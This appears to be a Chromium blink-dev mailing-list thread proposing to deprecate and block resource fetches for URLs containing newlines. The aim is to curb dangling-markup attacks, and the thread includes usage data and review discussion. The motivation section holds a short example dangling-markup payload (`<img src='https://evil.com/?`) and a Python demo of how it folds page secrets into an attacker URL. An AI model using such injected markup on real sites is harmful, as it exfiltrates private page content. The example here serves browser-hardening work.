Primary eng (and PM) emails
Summary
I'd like to add a deprecation warning for resource fetches for URLs that originally contained newline characters in the hopes that usage is curbed at levels reasonable for removal.
Motivation
As discussed in https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/rOs6YRyBEpw/D3pzVwGJAgAJ, dangling markup is the next softest attack surface, assuming robust defense against direct script injection. Some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.
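The newline-stripping behavior that enables this can be sketched in a few lines. This is a simplified model of the URL Standard's "remove all ASCII tab or newline from input" preprocessing step, not Chromium's actual parser:

```python
# Simplified model of the URL Standard's whitespace-stripping step:
# ASCII tab, LF, and CR are silently removed from the raw input
# before parsing begins.
def strip_url_whitespace(url: str) -> str:
    return "".join(ch for ch in url if ch not in "\t\n\r")

# An injected, unclosed attribute swallows markup across line breaks...
injected = "https://evil.com/?\n<p>secret token: 12345</p>\n"
# ...and the parser helpfully folds it all into one exfiltrating URL:
print(strip_url_whitespace(injected))
# → https://evil.com/?<p>secret token: 12345</p>
```

This is why the injected `<img src='https://evil.com/?` survives the intervening newlines: by the time the URL is parsed, they're gone.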
As it turns out, walking through and copying URLs to remove newline characters is also quite expensive (~13% of URL canonicalization time). Removing that complexity (by erroring out early) would have a marginally positive impact on perf.
Compatibility And Interoperability Risk
Moderate, depending on strategy.
URL parsing behavior is ancient, and is likely to be relied upon by the long tail. That said, the initial numbers gathered in https://www.chromestatus.com/metrics/feature/timeline/popularity/1768 aren't that terrible. While spot-checking the 94 hits in HTTP Archive[1], I realized that the 0.014% reflected in that metric is an upper-bound because a) I'm an idiot and forgot to initialize the "was whitespace removed" flag in `url::Parsed`'s copy constructor (surely random memory is always "false", right?), and b) I'm measuring all URL resolution rather than those that result in resource loads. My intuition is that the actual impact is significantly lower.
Based on the numbers we end up with, we could approach the problem in at least two ways:
1. We could block loads entirely, which is the simplest approach.
2. We could adopt parsing rules similar to CSS's `url(...`, which cuts the URL at the end of the line, rather than scanning for a closing `)`.
I'd prefer the former, but the latter is probably lower-risk, as URLs might still work even if a few URL params are chopped off.
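The two strategies can be contrasted with a small sketch. The function names and shapes here are illustrative only, not Chromium APIs:

```python
# Option 1: refuse to load any URL whose raw input contained a newline.
def strategy_block(raw: str):
    if "\n" in raw or "\r" in raw:
        return None  # load blocked outright
    return raw

# Option 2: CSS-url()-style, keep the URL but cut it at the first newline.
def strategy_truncate(raw: str) -> str:
    return raw.splitlines()[0] if raw else raw

url = "https://example.com/img?id=1\n' class='x"
print(strategy_block(url))     # → None (load blocked)
print(strategy_truncate(url))  # → https://example.com/img?id=1
```

Under option 2, the injected dangling markup still can't exfiltrate the rest of the page, but a URL that merely has trailing junk after the newline may keep working.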
Alternative implementation suggestion for web developers
Explicitly percent-encode newlines (e.g. as `%0A`). Also escape your input and output so you don't have content-injection holes in the first place.
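A minimal sketch of that fix, using Python's standard library for illustration:

```python
from urllib.parse import quote

# Percent-encode user-supplied values before embedding them in URLs,
# so a raw newline becomes %0A rather than reaching the URL parser:
print(quote("line1\nline2", safe=""))
# → line1%0Aline2
```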
Usage information from UseCounter
See above.
OWP launch tracking bug
Entry on the feature dashboard
https://www.chromestatus.com/feature/5735596811091968
Requesting approval to remove too?
No. I'd target a milestone out after landing the deprecation to collect more concrete metrics than I have above.
-mike

[1]:

```sql
SELECT
  url,
  JSON_EXTRACT(payload, '$._blinkFeatureFirstUsed.Features.DocumentCompleteURLHTTPContainingNewline') AS feature
FROM [httparchive:har.2017_03_15_chrome_pages]
HAVING feature IS NOT NULL
LIMIT 500
```
The use counter is surprisingly high for something one would expect to be very rare. Have you fixed it or added a new one that corresponds to the resource fetches you'd like to block?
As long as there are two possible paths, what would the deprecation message say? Could you learn anything from the http archive results?
If we could guess a best path and just be ready to course correct, that would be nice :)
On Thu, Mar 30, 2017 at 3:58 PM, Philip Jägenstedt <foo...@chromium.org> wrote:
> The use counter is surprisingly high for something one would expect to be very rare. Have you fixed it or added a new one that corresponds to the resource fetches you'd like to block?

I haven't fixed it yet; I was planning on doing that with the deprecation message once y'all let me at it. If you're concerned, I guess we can fix the counter and then deprecate once it hits stable and I can give you real numbers.

I suspect that the numbers are high for two reasons:

1. I didn't properly initialize the boolean in the copy-constructor, so there's a ~chance of non-deterministically deciding that a URL had whitespace stripped from it, even if it hadn't.
2. The use counter counted URL completions, as opposed to loads. We complete URLs all over the place, even if they're not at all related to resource loading.

> As long as there are two possible paths, what would the deprecation message say? Could you learn anything from the http archive results?

I spot-checked 20 of the 92 hits in HTTPArchive. Of those, only 3 loaded resources that contained newlines: two were analytics scripts that scraped the `keywords` meta information, but didn't encode newlines, and one was a typo in an `<img>` that neglected to close an attribute string (which is exactly the behavior I'm aiming to change). The remainder contained one or more links whose `href` contained newlines. I'm not able to judge the contents of the links, as they were all in languages I don't speak, but only 3 were in a page's navigational menu.

I can go through the other pages in more detail if that would be helpful.
> If we could guess a best path and just be ready to course correct, that would be nice :)

I would prefer to simply block loads. I'd only want to back off of that to a looser interpretation if the numbers show that blocking would have a larger-than-expected impact.
On Tue, Apr 4, 2017 at 5:20 PM 'Mike West' via blink-dev <blin...@chromium.org> wrote:
> I spot-checked 20 of the 92 hits in HTTPArchive. Of those, only 3 loaded resources that contained newlines: two were analytics scripts that scraped the `keywords` meta information, but didn't encode newlines, and one was a typo in an `<img>` that neglected to close an attribute string (which is exactly the behavior I'm aiming to change). The remainder contained one or more links whose `href` contained newlines.

That should suffice to give us an idea about the kinds of breakage to expect. It sounds like the 3 cases that would be affected would be fairly harmless. Was the img a 404 already, or was the newline in the query string and ignored?
It sounds like most newlines are in href attributes, then, and those will not be affected at all?
Extrapolating, perhaps 15 sites of the ~500k in HTTP Archive have resource URLs that would be blocked. That's ~0.003%, which cannot be meaningfully compared to use counter numbers, but it's a small enough number that we should probably try this and see how it goes.
> > If we could guess a best path and just be ready to course correct, that would be nice :)
>
> I would prefer to simply block loads. I'd only want to back off of that to a looser interpretation if the numbers show that blocking would have a larger-than-expected impact.

LGTM1. Can you report back here with the new use counter numbers before the actual removal hits stable?
On Tue, 28 Mar 2017 16:00:52 +0200, Mike West <mk...@chromium.org> wrote:
> 1. We could block loads entirely, which is the simplest approach.
> 2. We could adopt parsing rules similar to CSS's `url(...`, which cuts the URL at the end of the line, rather than scanning for a closing `)`.

This only happens in CSS if there is nothing but whitespace before EOF. If you do:

```css
@import url(style?
garbage);
```

then the whole declaration is dropped -- it doesn't import "style?".

> I'd prefer the former, but the latter is probably lower-risk, as URLs might still work even if a few URL params are chopped off.
Have you searched for data: URLs specifically? Or javascript:? Or is the proposal to only reject newlines for "special" schemes?
For completeness, the only instance that is not http, https, data, or javascript, is tel:
```
http://www.jusmisiones.gov.ar/,http://www.jusmisiones.gov.ar/,"<area class=""noborder iopacity100 icolor147a7a"" coords=""16,64,20,64,22,68,24,72,22,77,22,79,32,88,34,88,38,83,42,85,46,87,47,89,47,92,42,96,34,96,31,94,26,92,21,88,15,80,13,76,12,74,12,70,13,67"" href=""tel:
+543764446543"" shape=""poly"" />"
```